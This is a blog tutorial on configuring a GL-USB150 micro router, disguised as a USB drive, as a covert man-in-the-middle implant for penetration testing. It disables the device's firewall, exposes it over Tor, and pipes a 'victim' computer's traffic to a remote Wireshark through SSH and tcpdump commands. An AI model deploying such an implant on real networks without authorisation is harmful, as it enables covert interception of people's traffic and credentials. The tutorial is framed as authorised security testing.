By Mason Jeffers Taylor
I the found a perfect super cheap Man-In-The-Middle device for penetration testing. The GL-USB150 is a very small router.
At first glance it looks like a USB drive.
It runs the powerful and hackable OpenWRT Linux, which makes it perfect for interesting projects. It boots up when plugged into a power bank, charger, or a computer’s USB port.
When inserted into a Windows or Linux computer it boots to Linux then registers itself to the host (your client’s) computer as a USB Ethernet device. It becomes the default route to the network. This causes the PC to direct all it’s traffic through this device as opposed to the WiFi or Ethernet it was intended to be using. The router then joins a predetermined WiFi access point which it uses as it’s path to the Internet. You can use your phone’s tethering/hot spot for this, or you can use the WiFi on site if you know the customer gave you (of you already know) the credentials. It also becomes a WiFi access point, but that’s a story for another article.
By setting this router to be accessible via the Tor Network you can access it remotely, usually even if the router is deployed behind a firewall or cable modem. (see the next page for tor instructions)
This means you can walk into any your customer’s building and just push a small innocent looking USB device into a computer then watch and manipulate it’s traffic from the comfort of your home. You would also have access to a full blown Linux box in this network which you could use to mount any number of attacks.
Basic Set Up of the Micro Router:
- Open the new GL-USB150 and plug it into your computer.
- Wait 60 seconds for it to boot.
- Go to https://192.168.8.1
- Follow the instructions. Keep in mind that you want to set it to connect to the WiFi access point you will be using in the field. I use my phone’s tethering hotspot.
Disable the Firewall so you can access the Micro Router via SSH from the Internet: (Yes there is probably a better way to accomplish this)
- Log into the command line via
service firewall disable firewall
service firewall stop
Setting up SSH Public Key (needed for Wireshark):
- On you Linux computer:
- Make sure you have a SSH public key, usually found here
~/.ssh/id_rsa.pub. If you don’t run this
scp ~/.ssh/id_rsa.pub firstname.lastname@example.org:/etc/dropbear/authorized_keys
- Verify you can login with no password via:
Setting up Wireshark remotely:
A. Setting Up tcpdump on your Micro Router:
- Log into the command line via
opkg update && opkg install tcpdump
B. Setting Wireshark to Use Your Micro Router as a Source:
- On your Linux computer:
sudo apt-get install wireshark
sudo mkfifo /tmp/pipe
sudo chmod 777 /tmp/pipe
wireshark -k -i /tmp/pipe & ssh email@example.com "tcpdump -i any -s 0 -U -w - not port 22" > /tmp/pipe
- Now take a moment to appreciate that you are observing traffic from your “victim” computer on a different network in a remarkable discreet fashion.
Now Go Plug Your Little Router in Something Somewhere (with permission.)
2nd Update: I spoke with GL.inet and they will ship again soon. They are closed for Chinese New Year.
© 2019 DKE Consulting LLC © 2019 Better Safe(TM)